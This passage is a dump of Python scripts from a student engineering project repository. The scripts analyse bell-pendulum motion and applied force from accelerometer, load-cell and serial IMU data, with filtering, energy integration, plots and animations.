np.zeros(len(force_corrected2))\nstarts_and_ends = np.zeros((len(peak_matrix),2))\nforce_in = np.zeros(len(smooth_force_corrected2))\nforce_out = np.zeros(len(smooth_force_corrected2))\nenergy = np.zeros((len(peak_matrix),2))\npower = np.zeros((len(peak_matrix),2))\ncount = 0\n\nforce_peaks = [0] * (len(theta_zeros)-1)\n\nfor i in range(len(theta_zeros)-1):\n section = range(theta_zeros[i],theta_zeros[i+1])-start\n force_section = force[section]\n if theta[start:][section[0]+10]<0: #if theta is pointing down, then flip the force section\n force_section *= -1\n force_peaks[i] = np.argmax(force[find_peaks(-force_section)[0]])+section[0]\n # force_range_peaks = find_peaks(abs(low_smooth_force)[section],prominence=0)\n # mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n # begin = mini_peaks_before[-1]+prev_peak\n # prev_end = mini_peaks_before[0]+prev_peak\n # if count != len(peaks)-1:\n # peak_matrix[count,0] = begin\n # if count != 0:\n # peak_matrix[count-1,2] = prev_end\n\n# plt.plot(timestamps,theta,label='theta')\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:][force_peaks],force[force_peaks],'x',label='force peaks')\n# plt.show()\n#\n# peaks = find_peaks(abs(force),prominence=0,distance=25)[0]\n# smoothed_peaks = find_peaks(abs(low_smooth_force),prominence=0,distance=25)[0]\n# plt.plot(timestamps,theta,label='theta')\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:][peaks],force[peaks],'x',label='force peaks')\n# plt.plot(timestamps[start:],low_smooth_force,label='low smooth')\n# 
plt.plot(timestamps[start:][smoothed_peaks],low_smooth_force[smoothed_peaks],'x',label='peaks for low smooth force')\n# # plt.plot(timestamps[start:],smooth_force,label='smooth')\n# plt.legend()\n# plt.show()\n\n\n\nfor _ in peak_matrix[:,1]:\n force_start = max(noisy_peaks[noisy_peaks<_])\n force_end = min(noisy_peaks[noisy_peaks>_])\n # starts_and_ends[count,0],starts_and_ends[count,1] = force_start,force_end\n force_curve[force_start:force_end] = smooth_force_corrected2[force_start:force_end]\n nearest_theta_dot_zero = theta_dot_zeros[abs(_-theta_zeros).argmin()]\n if force_start<nearest_theta_dot_zero:\n force_out[force_start:nearest_theta_dot_zero] = force_curve[force_start:nearest_theta_dot_zero]\n if force_end>nearest_theta_dot_zero:\n force_in[nearest_theta_dot_zero:force_end] = force_curve[nearest_theta_dot_zero:force_end]\n energy[count,0] = max(cumtrapz(abs(force_in)[force_start:force_end],initial=0))\n energy[count,1] = max(cumtrapz(abs(force_out)[force_start:force_end],initial=0))\n power[count,0] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_in)[force_start:force_end]))\n power[count,1] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_out)[force_start:force_end]))\n count += 1\n\n\n\n# plt.plot(timestamps[start:],force_curve)\n# plt.plot(timestamps[start:],theta_dot[start:])\nplt.plot(timestamps[start:],np.multiply(theta_dot[start:],force_curve))\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Power input $\\frac{T}{J}\\dot{\\theta}(s^{-3})$')\nplt.show()\nstored_energy = cumtrapz(np.multiply(theta_dot[start:],force_curve),initial=0) #starts at start\nenergy_zeros = find_peaks(-stored_energy)[0] #starts at start\nenergy_start = energy_zeros[0] #starts at start\nzero_energy_line = np.polyfit(timestamps[start:][energy_zeros],stored_energy[start:][energy_zeros],deg=1)[0]\nstored_energy = stored_energy[energy_start:]\nstored_energy_times = timestamps[start+energy_start:]-timestamps[start+energy_start]\nenergy_zeros -= energy_zeros[0]\nplt.plot(stored_energy_times,stored_energy,label='Stored energy')\nplt.plot(stored_energy_times[energy_zeros],stored_energy[energy_zeros],'x',label='Energy \"zeros\"')\nplt.plot(np.array([0,60]),np.array([0,60])*zero_energy_line,'--',linewidth=0.5,label='Line fitting energy \"zeros\"')\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.legend()\nplt.show()\n\nplt.plot(stored_energy_times,stored_energy-stored_energy_times*zero_energy_line,label='Stored energy accounting for friction')\nplt.plot(timestamps[start:][theta_dot_zeros]-timestamps[start:][theta_dot_zeros[0]],np.zeros(len(theta_dot_zeros)),'x')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy adjusted for friction $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\nplt.plot(stored_energy_times,stored_energy-stored_energy_times*zero_energy_line,label='Stored energy accounting for friction')\nenergy_calculation = 0.5*(1-p_corrected2*100/9.81)*theta_dot - p_corrected2*(1-np.cos(theta))\nplt.plot(timestamps-timestamps[start+energy_start],energy_calculation,label='Energy Calculated')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# 
plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x')\nplt.plot((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros],abs(theta_corrected2[start:][theta_dot_zeros]),'x')\ncorrelation = np.polyfit((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros],abs(theta_corrected2[start:][theta_dot_zeros]),deg=1)\nplt.plot(np.array([-15,0]),np.array([-15,0])*correlation[0]+correlation[1],'--',linewidth=0.5)\nerr = np.mean(abs(abs(theta_corrected2[start:][theta_dot_zeros])-((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros]*correlation[0]+correlation[1])),axis=0)\nplt.ylabel(r'Angle at max (rad)')\nplt.xlabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# print(np.column_stack((power,power[:,0]-power[:,1])))\n\n# theta_peaks = find_peaks(abs(get_theta(freeswing)[free_start:]))[0]\n# exponent = np.polyfit(freeswing[free_start:,0][theta_peaks],np.log(abs(get_theta(freeswing)[free_start:][theta_peaks])),1)\n# plt.plot(freeswing[free_start:,0],abs(get_theta(freeswing)[free_start:]))\n# plt.plot(freeswing[free_start:,0],np.exp(exponent[1])*np.exp(exponent[0]*freeswing[free_start:,0]))\n\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:],force_corrected,label='force corrected')\n# plt.plot(timestamps[start:],force_corrected2,label='force corrected 2')\n# plt.plot(no_force_times,no_force_force,'.')\nplt.show()\n#\n# plt.legend()\n\n# plt.plot(timestamps[start:],theta_corrected2[start:],label=r'$\\theta$')\n#\n# plt.plot(timestamps,filtered_a_r)\n# theta_zero = find_peaks(filtered_a_r,prominence=0.5)[0]\n# plt.plot(timestamps[theta_zero],filtered_a_r[theta_zero],'x')\nplt.plot(timestamps[start:],theta_corrected2[start:])\nplt.plot(timestamps[start:],force)\n# plt.plot(timestamps[start:],smooth_force_corrected)\nplt.show()\n#\n#\n#\n# plt.plot(timestamps[start:],force_corrected)\n# plt.plot(timestamps[start:],force_corrected2)\n# plt.plot(timestamps[start:][peak_matrix[:,1]],force_corrected2[peak_matrix[:,1]])\n# plt.plot(no_force_times,no_force_force,'.')\n#\n#\n# plt.plot(timestamps,theta_dot)\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x',label=r'$\\theta$ maximums')\nabs(theta_corrected2[start:][theta_dot_zeros])\ntheta_differences = np.zeros(len(theta_dot_zeros)-1)\nenergy_differences = np.zeros(len(theta_dot_zeros)-1)\nfor i in range(len(theta_dot_zeros)-1):\n theta_differences[i] = abs(np.cos(theta_corrected2[start:][theta_dot_zeros[i+1]]))-abs(np.cos(theta_corrected2[start:][theta_dot_zeros[i]]))\n energy_differences[i] = power[i,0]-power[i+1,1]\n#\n# plt.plot(energy_differences,theta_differences,'.')\n#\n# plt.plot(timestamps[start:][theta_dot_zeros],abs(theta_dot_corrected2[start:][theta_dot_zeros]),'x',label=r'$\\theta$')\n# # plt.plot(timestamps[start:][peak_matrix[:,1]],abs(force_curve)[peak_matrix[:,1]],'x')\nplt.plot(timestamps[start:],abs(force_in),'g')\nplt.plot(timestamps[start:],abs(force_out),'r')\nplt.xlabel('time (s)')\nplt.ylabel(r'$\\frac{T}{J}$(rad$s^{-2}$)')\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# plt.plot(timestamps[start:],abs(theta_dot)[start:])\n# plt.plot(timestamps[start:],-abs(smooth_force_corrected2))\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_dot[start:][theta_dot_zeros],'x')\n# plt.plot(timestamps[start:][noisy_peaks],-abs(smooth_force_corrected2)[noisy_peaks],'x')\nplt.show()\n# plt.plot(timestamps[start:],theta_dot[start:])\n# 
plt.plot(timestamps[start:][theta_dot_zeros],theta_dot[start:][theta_dot_zeros],'x')\n# plt.plot(timestamps[start:],theta[start:])\n# plt.plot(timestamps[theta_zeros],theta[theta_zeros],'x')\n\n# plt.plot(timestamps[start:],abs(force_corrected2))\n# plt.plot(timestamps[start:],abs(smooth_force_corrected2))\n# plt.plot(timestamps[start:],-abs(force_corrected2))\n# plt.show()\n# plt.plot(timestamps[start:][peak_matrix2[:,0]],abs(smooth_force_corrected2)[peak_matrix2[:,0]],'x')\n# plt.plot(timestamps[start:][peak_matrix2[:,2]],abs(smooth_force_corrected2)[peak_matrix2[:,2]],'x')\n# plt.show()\n\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n p = get_gradient(data)\n theta = get_theta(data)[start:]\n force = filtered_theta_double_dot-p*np.sin(theta)\n no_bins = 20\n means_variance = np.zeros([no_bins,2])\n free_theta = get_theta(freeswing)[free_start:]\n free_p = get_gradient(freeswing)\n free_theta_double_dot = np.gradient(freeswing[:,3][free_start:],freeswing[:,0][free_start:])\n free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n free_bin_indices = np.where((free_theta>=bin_start)&(free_theta<bin_end))\n data_bin_indices = np.where((theta>=bin_start)&(theta<bin_end))\n if np.size(free_bin_indices)>0:\n means_variance[bin,0] = np.mean(free_force[free_bin_indices])\n means_variance[bin,1] = np.var(free_force[free_bin_indices])\n fixed_force[data_bin_indices] = force[data_bin_indices] - means_variance[bin,0]\n return fixed_force, means_variance\n\"\"\"\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\n\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n return line,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:start+i]\n x = np.sin(theta[start:start+i])\n line.set_data(x, y)\n return line,\n#Call the animator. 
blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nx = np.array([-2,2])\nplt.plot(x,p*x,'r',linewidth=1,label=\"Fit\") #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\"\"\"\n#PENDULUM AND FORCE ANIMATION\nfig_pend = plt.figure()\nax_pend = plt.axes(xlim=(-1.5, 1.5), ylim=(-1.5,1.5))\nbell, = ax_pend.plot([], [], 'bo', lw=5,label='Bell')\ntorque, = ax_pend.plot([], [], 'ro', lw=5, label='Force')\ndef init_pend():\n bell.set_data([], [])\n torque.set_data([], [])\n return bell, torque,\n#Animation function. This is called sequentially\ndef animate_pend(i):\n y = -np.cos(theta_corrected2[i+start]) #Bell's y position\n x = np.sin(theta_corrected2[i+start]) #Bell's x position\n bell.set_data(x, y)\n x_torque = force_curve[i] #Torque/J at time i\n torque.set_data(x_torque/3,0)\n return bell, torque,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim_pend = animation.FuncAnimation(fig_pend, animate_pend, init_func=init_pend, frames=len(theta[start:]), interval=20, blit=True)\n#anim_pend.save('2sidepush_force.gif', fps=50, extra_args=['-vcodec', 'libx264'])\nplt.title('Bell swinging and force applied')\nplt.legend()\nplt.show()\n\"\"\"\n#FORCE vs VELOCITY ANIMATION\nfig_force_vel = plt.figure()\nax_force_vel = plt.axes(xlim=(-5, 5), ylim=(-3,3))\nline_force_vel, = ax_force_vel.plot([], [], lw=2)\ndef init_force_vel():\n line_force_vel.set_data([], [])\n return line_force_vel,\n#Animation function. This is called sequentially\ndef animate_force_vel(i):\n y = smooth_force[0:i]\n x = theta_dot[start:start+i]\n line_force_vel.set_data(x, y)\n return line_force_vel,\n#Call the animator. 
blit=True means only re-draw the parts that have changed.\nanim_force_vel = animation.FuncAnimation(fig_force_vel, animate_force_vel, init_func=init_force_vel,\n frames=len(force), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nplt.xlabel(r'$\\dot{\\theta}$')\nplt.ylabel(r'Some force $\\frac{T}{J}$')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot line fit through theta double dot vs sin(theta) relationship\n\n#allowed_indices = np.where(abs(x)<20.2) #find indices where line is straight\nx = np.sin(theta[start:])\ny = filtered_theta_double_dot[start:]\nplt.plot(x,y,'x',label='All points') #plot all the data points\n#plt.plot(x[allowed_indices],y[allowed_indices],'gx',label='Points used in fitting') #plot the allowed data points for fitting\nplt.plot(x,p*x,'r',label='Line fit through origin of central points') #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$) with a line fitted through')\nplt.show()\n\n#Force, theta and theta_dot vs time\nplt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\nplt.plot(timestamps[start:],theta[start:],label=r'$\\theta$')\nplt.plot(timestamps[start:],theta_dot[start:],label=r'$\\dot{\\theta}$')\nplt.axhline(0,color='b',linestyle='--')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n\n#Force, theta and theta_dot vs time\n\n#plt.plot(timestamps[start:][peaks],force[peaks],'x',label=\"Force measurement\")\n#plt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\nfor i in range(len(peak_matrix)):\n plt.plot(timestamps[start:][peak_matrix[i,0]:peak_matrix[i,2]],force[peak_matrix[i,0]:peak_matrix[i,2]],'r-')\n plt.plot(timestamps[start:][peak_matrix[i,0]:theta_dot_zeros[i]],force[peak_matrix[i,0]:theta_dot_zeros[i]],'b-')\n plt.plot(timestamps[start:][theta_dot_zeros[i]:peak_matrix[i,2]],force[theta_dot_zeros[i]:peak_matrix[i,2]],'g-')\n#plt.plot(timestamps[start:][peak_matrix[:,0]],abs(smooth_force)[peak_matrix[:,0]],'x')\n#plt.plot(timestamps[start:][peak_matrix[:,2]],abs(smooth_force)[peak_matrix[:,2]],'x')\nplt.plot(timestamps[start:],theta[start:],label=r'$\\theta$')\n#plt.plot(timestamps[start:],abs(theta_dot[start:]),label=r'$\\dot{\\theta}$')\nplt.axhline(0,color='b',linestyle='--')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n\n\n\n#Plot Force vs (mlg/J)sin(theta)\nplt.plot(-p*np.sin(theta[start:]),smooth_force)\nplt.xlabel(r'$\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.ylabel(r'$\\frac{T}{J}$')\nplt.title(r'$\\frac{T}{J}$ vs $\\frac{mgl}{J}sin(\\theta)$')\nplt.show()\n\n#Plot Force vs 
velocity\nplt.plot(theta_dot[start:],smooth_force)\nplt.xlabel(r'$\\dot{\\theta}$')\nplt.ylabel(r'$\\frac{T}{J}$')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.show()\n\"\"\"\n"
},
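pendulum.py integrates the applied power (T/J)·θ̇ to track the energy fed into the bell. For reference, the mechanical energy per unit inertia of the free pendulum, written with the fitted gradient p from get_gradient (so that p ≈ −mgl/J), is the standard expression below; note that the file's energy_calculation line uses θ̇ rather than θ̇², which is worth checking against this form.

\frac{E}{J} \;=\; \tfrac{1}{2}\dot{\theta}^{2} + \frac{mgl}{J}\bigl(1 - \cos\theta\bigr)
\;=\; \tfrac{1}{2}\dot{\theta}^{2} - p\bigl(1 - \cos\theta\bigr),
\qquad p \approx -\frac{mgl}{J}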
{
"alpha_fraction": 0.5912284255027771,
"alphanum_fraction": 0.6244411468505859,
"avg_line_length": 39.14529800415039,
"blob_id": "8088e63a519f253242dee2a846a2068d1dab6fb8",
"content_id": "3420855fca94658d711191d1ef7450ac793a9e46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 117,
"path": "/scale.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\ndef despiker(data):\n #gather the data and put the columns into seperate variables\n times = data[:,0]\n masses = data[:,1]\n #shift the data down by 1 reading\n shifted = masses[0:-1]\n shifted = np.insert(shifted,0,masses[0])\n #find difference of data and shifted data to identify outliers\n spikes = abs(masses-shifted)\n # index the spikes\n indices = np.array(np.where(spikes>10)).transpose()\n # at each spike, replace the error by an interpolation. i+3 since some spikes are over 2 readings\n for i in indices:\n masses[i] = (masses[i-1] + masses[i+3])/2\n #concatenate the timestamps with the new smoothed mass data\n despiked = np.column_stack((times,masses))\n return despiked\ndef mass_to_force(despiked_data,standing_mass_start,standing_mass_end):\n standing_mass = np.mean(despiked_data[standing_mass_start:standing_mass_end,1])\n pull_force = standing_mass-despiked_data[:,1]\n return pull_force\n###-------------------------------------------------------------------------###\n###-------------------------------UNPACK DATA-------------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\n\nme_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 12:11:19 GSM/follow.csv'\nyangsheng_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 22:11:19 Benet/yangsheng.csv'\nsam_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 12:11:19 GSM/sam.csv'\narms_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 19:11:19 GSM/arms.csv'\n\nme_data = genfromtxt(me_file,delimiter=',')\nyangsheng_data = genfromtxt(yangsheng_file,delimiter=',')\nsam_data = genfromtxt(sam_file,delimiter=',')\narms_data = genfromtxt(arms_file,delimiter=',')\n\nme_despiked_data = despiker(me_data)\nyangsheng_despiked_data = despiker(yangsheng_data)\nsam_despiked_data = despiker(sam_data)\narms_despiked_data = despiker(arms_data)\n\nme_timestamps,me_force = me_despiked_data[:,0],me_despiked_data[:,1]\nyangsheng_timestamps,yangsheng_force = yangsheng_despiked_data[:,0],yangsheng_despiked_data[:,1]\nsam_timestamps,sam_force = sam_despiked_data[:,0],sam_despiked_data[:,1]\narms_timestamps,arms_force = arms_despiked_data[:,0],arms_despiked_data[:,1]\n\nme_pull_force = mass_to_force(me_despiked_data,262,556)\nyangsheng_pull_force = mass_to_force(yangsheng_despiked_data,5780,7000)\nsam_pull_force = mass_to_force(sam_despiked_data,215,895)\narms_pull_force = mass_to_force(arms_despiked_data,307,563)\n\nme_smooth_pull_force = savgol_filter(me_pull_force,window_length=21,polyorder=3)*9.81\nyangsheng_smooth_pull_force = savgol_filter(yangsheng_pull_force,window_length=21,polyorder=3)*9.81\nsam_smooth_pull_force = 
savgol_filter(sam_pull_force,window_length=21,polyorder=3)*9.81\narms_smooth_pull_force = savgol_filter(arms_pull_force,window_length=21,polyorder=3)*9.81\n\nplt.plot(me_force)\nplt.title('me')\nplt.show()\n\nplt.plot(yangsheng_force)\nplt.title('yangsheng')\nplt.show()\n\nplt.plot(sam_force)\nplt.title('sam')\nplt.show()\n\nplt.plot(arms_force)\nplt.title('arms')\nplt.show()\n\n# plt.plot(me_data[:,0],me_pull_force)\nplt.plot(me_data[:,0],me_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([81, 101, -100, 500])\nplt.show()\n\n# plt.plot(me_data[:,0],me_pull_force)\nplt.plot(yangsheng_data[:,0],yangsheng_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([130, 150, -100, 500])\nplt.show()\n\n# plt.plot(sam_data[:,0],sam_pull_force)\nplt.plot(sam_data[:,0],sam_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([68.5, 88.5, -100, 500])\nplt.show()\n\n# plt.plot(sam_data[:,0],sam_pull_force)\nplt.plot(arms_data[:,0],arms_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Arm intertial force measured (N)')\nplt.axhline(y=0 , linestyle='--')\nplt.axis([7.5, 23, -300, 300])\nplt.show()\n"
},
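A usage sketch for the two helpers in scale.py (illustrative only: the file name and window indices below are placeholders, and despiker/mass_to_force come from the file above; note also that despiker reads masses[i+3], so a spike in the last few samples would need a bounds guard):

from numpy import genfromtxt
from scipy.signal import savgol_filter

# Despike a load-cell log, reference it to a quiet "standing" window,
# then smooth and convert kg to Newtons exactly as scale.py does.
data = genfromtxt('session.csv', delimiter=',')   # columns: time, mass (kg)
clean = despiker(data)
pull = mass_to_force(clean, 100, 400)             # sample range where the ringer stands still
pull_N = savgol_filter(pull, window_length=21, polyorder=3) * 9.81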
{
"alpha_fraction": 0.6589061617851257,
"alphanum_fraction": 0.685218334197998,
"avg_line_length": 36.80729293823242,
"blob_id": "f2d32d7d956462e45b8cfa682e4fd4f60ad77541",
"content_id": "cda59146bec930f59f44480eaa4a61788dcf1806",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7259,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 192,
"path": "/COLE.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "# THIS CELL SHOULD ONLY NEED TO BE RUN ONCE, AT THE BEGINNING OF THE SESSION.\n\n# EDIT THESE LINES\n\ncomport='/dev/cu.usbmodem14101' # Enter the COM port number. Default is comport='COM4'\nwatermark='WordWord' # Enter the two 4-letter words provided to you by the demonstrator. Default is watermark='WordWord'\nuserids=['userid1','userid2'] # Enter list of lab group's userids; whoever is logged on should be listed first. Default is userids=['userid1','userid2']\ncarnumber=0 # Enter the car number (integer in the range 1-8). Default is carnumber=0\n\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\n\n#\n# Import python packages\n#\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nimport serial\nimport time\nimport numpy as np\nfrom cobs import cobs\nfrom scipy import integrate\n\n#\n# Open the USB port into which the radio is plugged\n#\nprint('Wait a few seconds for serial port to open...')\ntry:\n ser = serial.Serial(comport, baudrate=57600)\n ser.isOpen() # try to open the port; will cause error if port is already open\nexcept IOError: # if the port is already open, close it and open it again\n ser.close()\n ser.open()\n\ntime.sleep(2) # pause for 2 seconds to allow port to settle down\nser.flush() # flush the port to remove any spurious data\nprint('Serial port open:',ser.name) # print name of port to confirm correct opening\n\n#\n# Define a function to read a line of data from the serial port.\n#\n# The arduino sends a line of data from the Arduino twenty times a second.\n# Each line contains: one measurement from each sensor; the time; and a checksum.\n# Each line is terminated by an end of line character.\ndef readmotiondata():\n eol = bytes([0]) # define the end of line character as a zero byte\n leneol = len(eol)\n motiond = bytearray() # set up an array of bytes\n while True:\n c = bytes(ser.read()) # read a byte from the serial port into variable c\n if c == eol:\n break # if the end of line character is read, return from the function with the bytes in motiond\n else:\n motiond += c # otherwise append the byte to the array\n return bytes(motiond)\n# Execute the readmotiondata function once to read the first (possibly incomplete) line of bytes and ignore it\nreadmotiondata()\n\n#\n# Initialise some variables\n#\nmotiondata=np.array([],dtype='uint16') # Initialise a numpy array of unsigned 16-bit (two byte) integers\naxlist=[] # initialise some python lists (lists are computationally more efficient than numpy arrays when we don't know the final size)\naylist=[]\nomegazlist=[]\ntlist=[]\ncounterlist=[]\n\n\n# DO NOT EDIT ANY OF THIS CELL\n\nprint('Wait up to 8 s for plot to appear...')\n\n# use 'magic' to allow matplotlib to work properly in the notebook\n# ensure this line is after the opening of the serial port\n# %matplotlib notebook\n\ntwidth=3 # length of time axis (plotting is slow and hence serial buffers fill up if time axis is too long)\n# check this is short enough by comparing real time with time on x-axis during plotting.\n\naxlist[:]=[] # empty the lists\naylist[:]=[]\nomegazlist[:]=[]\ntlist[:]=[]\ncounterlist[:]=[]\n\nfig=plt.figure(0,figsize=(9.5,6))\n\naxes1=plt.subplot(221) # cartesian plot\nline1, = axes1.plot(tlist, aylist, marker='o', markersize=3, color=\"red\")\n\naxes2=plt.subplot(222) # cartesian plot\nline2, = axes2.plot(tlist, counterlist, marker='o', markersize=3, color=\"green\")\n\naxes3=plt.subplot(223) # cartesian plot\nline3, = axes3.plot(tlist, counterlist, marker='o', markersize=3, 
color=\"blue\")\n\naxes4=plt.subplot(224) # cartesian plot\nline4, = axes4.plot(tlist, axlist, marker='o', markersize=3, color=\"orange\")\n\nline=[line1,line2,line3,line4] # list of line objects\n\nanim_running=False # boolean to indicate whether animation should be running or not\n\nfor x in range(150): # read sufficient number of lines from serial port to flush buffer before recording/plotting\n readmotiondata()\n\nprint('Press any key to start or stop recording/plotting (do not use the icons above)')\n\n#def onClick(event):\ndef press(event):\n global anim_running\n if anim_running:\n anim_running = False\n else:\n axlist[:]=[] # empty the lists before starting the recording/plotting\n aylist[:]=[]\n omegazlist[:]=[]\n tlist[:]=[]\n counterlist[:]=[]\n anim_running = True\n\ndef init():\n axes1.set_xlim(0,twidth)\n axes1.set_ylim(-1,1)\n axes1.set_ylabel(r'$a_y\\ /\\ \\rm{m \\ s^{-2}}$')\n axes2.set_xlim(0,twidth)\n axes2.set_ylim(-1,1)\n axes2.set_ylabel(r'$n$')\n axes3.set_xlim(0,twidth)\n axes3.set_ylim(-1,1)\n axes3.set_ylabel(r'$\\omega_z\\ /\\ \\rm{rad \\ s^{-1}}$')\n axes3.set_xlabel(r'time $t\\ /\\ \\rm{s}$')\n axes4.set_xlim(0,twidth)\n axes4.set_ylim(-1,1)\n axes4.set_ylabel(r'$a_x\\ /\\ \\rm{m \\ s^{-2}}$')\n axes4.set_xlabel(r'time $t\\ /\\ \\rm{s}$')\n axes1.set_title('Lateral acceleration')\n axes2.set_title('Wheel encoder count')\n axes3.set_title('Yaw velocity')\n axes4.set_title('Longitudinal acceleration')\n return line\n\ndef update(frame):\n motioncoded = readmotiondata() # serial read into bytes object converted to list of ints, last element is line feed\n try:\n motiondata = cobs.decode(motioncoded) #cobs\n except cobs.DecodeError:\n print('COBS DecodeError')\n else:\n motiondata = list(motiondata) # bytes object converted to list of ints, last element is line feed\n checksumrecvd=np.sum(motiondata[0:-1],dtype=np.uint8) # checksum\n if (checksumrecvd != motiondata[-1]):\n print('Checksum error')\n else:\n millis=np.uint32(motiondata[0] | motiondata[1]<<8 | motiondata[2]<<16 | motiondata[3]<<24)\n accx=np.int16(motiondata[4] | motiondata[5]<<8)\n accy=np.int16(motiondata[6] | motiondata[7]<<8)\n gyrz=np.int16(motiondata[20] | motiondata[21]<<8)\n encoder=np.int16(motiondata[22] | motiondata[23]<<8) # 22 = 4 time bytes + 18 imu bytes\n\n if anim_running:\n axlist.append(accx/100) # x acceleration, /100 to convert to m/s/s\n aylist.append(accy/100) 